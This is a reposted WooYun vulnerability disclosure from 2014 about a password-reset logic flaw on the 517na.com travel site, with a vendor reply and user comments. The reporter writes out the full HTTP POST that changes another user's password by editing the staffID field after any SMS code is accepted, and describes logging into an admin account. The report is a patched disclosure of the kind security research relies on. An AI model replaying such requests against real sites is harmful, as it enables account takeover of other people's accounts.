四川我要去哪517旅行网重置任意账号密码漏洞

admin 2015年8月5日00:12:19评论444 views字数 236阅读0分47秒阅读模式
摘要

2014-11-10: 细节已通知厂商并且等待厂商处理中
2014-11-10: 厂商已经确认,细节仅向厂商公开
2014-11-11: 厂商已经修复漏洞并主动公开,细节向公众公开

漏洞概要 关注数(16) 关注此漏洞

缺陷编号: WooYun-2014-82582

漏洞标题: 四川我要去哪517旅行网重置任意账号密码漏洞

相关厂商: 517na.com

漏洞作者: Jim叔叔

提交时间: 2014-11-10 10:18

修复时间: 2014-11-11 21:40

公开时间: 2014-11-11 21:40

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经修复

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 设计不当

0人收藏


漏洞详情

披露状态:

2014-11-10: 细节已通知厂商并且等待厂商处理中
2014-11-10: 厂商已经确认,细节仅向厂商公开
2014-11-11: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

呀,要毕业了,看到517na在校园招聘,去面试时,前台漂亮MM给我倒了一杯茶,面试官迟迟不来,于是...

详细说明:

我先注册了一个自己的账号,然后按照找回密码的正常流程走了一遍。猜测可能存在逻辑绕过:

然后我从主站fuzz到一个账号为qingxia,点击找回密码,

四川我要去哪517旅行网重置任意账号密码漏洞

咦,打了马赛克!!右键查看源代码里发现有详细的手机号和邮箱。。(马赛克你是在逗我吗!)

四川我要去哪517旅行网重置任意账号密码漏洞

在找回密码处点击获取验证码后,随便输入一个6位数(此处无需短信验证码正确与否),点下一步。

然后直接提交如下post包修改密码。(此数据包为我的账号用正常流程抓取到的第三步设置新密码的数据包)

注意:需修改ASP.NET_SessionId为当前sessionid,staffID修改为要重置密码的用户名qingxia

code 区域
POST /FindPassword/ChangePsw HTTP/1.1
Host: user.517na.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://user.517na.com/FindPassword/ComfirmNewPwd?UserID=xjcjinmao&R=353730&D=2014-07-11%2022:05:23&Sign=C8690DB5B5240F7702755E8F8859622F
Content-Length: 31
Cookie: ASP.NET_SessionId=zvxqzk22ejubrmmk40hxr05e
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

password=123123&staffID=qingxia

四川我要去哪517旅行网重置任意账号密码漏洞

返回OK!!!

尝试用qingxia 123123登录,成功进入后台,发现是一个票务分销商的账号:

四川我要去哪517旅行网重置任意账号密码漏洞

查看源代码把我惊呆了,密码的md5清晰的写在了里面:

四川我要去哪517旅行网重置任意账号密码漏洞

还是一个管理员账号:

四川我要去哪517旅行网重置任意账号密码漏洞

就在此时,终于等到面试官叫我进去面试了,然后就没有然后了。。。

漏洞证明:

四川我要去哪517旅行网重置任意账号密码漏洞

四川我要去哪517旅行网重置任意账号密码漏洞

四川我要去哪517旅行网重置任意账号密码漏洞

修复方案:

听说贵公司安全是运维在做。。。

版权声明:转载请注明来源 Jim叔叔@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-11-10 10:49

厂商回复:

谢谢,已确认,正在修复。

最新状态:

2014-11-11:已修复。


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

0%

100%

0%

0%

0%


评价

  1. 2014-11-09 14:56 | 夏殇 ( 实习白帽子 | Rank:44 漏洞数:26 | 不忘初心,方得始终。)

    1

    哎呀,jim叔卖萌了

  2. 2014-11-10 17:11 | Seven.Sea ( 普通白帽子 | Rank:118 漏洞数:28 | 唯有安全与美食不可辜负。)

    1

    这个描述我真是醉了

  3. 2014-11-12 11:16 | Pt0s ( 路人 | Rank:4 漏洞数:1 | 好奇怪,那人好像一条狗啊)

    1

    zui 醉了

  4. 2014-11-12 12:25 | BMa 四川我要去哪517旅行网重置任意账号密码漏洞 ( 核心白帽子 | Rank:2078 漏洞数:229 )

    1

    这应该是跳过了验证步骤?

  5. 2014-11-13 15:04 | milk ( 路人 | Rank:21 漏洞数:6 | 美女,你肥皂掉了)

    1

    你继续看,会发现他们公司其他更好玩的事情

  6. 2014-11-13 15:24 | Jim叔叔 ( 普通白帽子 | Rank:153 漏洞数:25 | 这样子不太好吧。。)

    1

    @milk 前端还是后端

  7. 2014-11-14 13:03 | kaysen ( 路人 | Rank:8 漏洞数:3 | 折腾Python、Php、Linux)

    2

    你那在线解密只解密白C似的密码,复杂一点的解不出,实际上是拿字典生成了原始密码=>MD5密码,存入数据库的

  8. 2014-11-27 13:43 | weeeer ( 路人 | Rank:14 漏洞数:1 | 在路上.........)

    1

    默默连上wifi

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin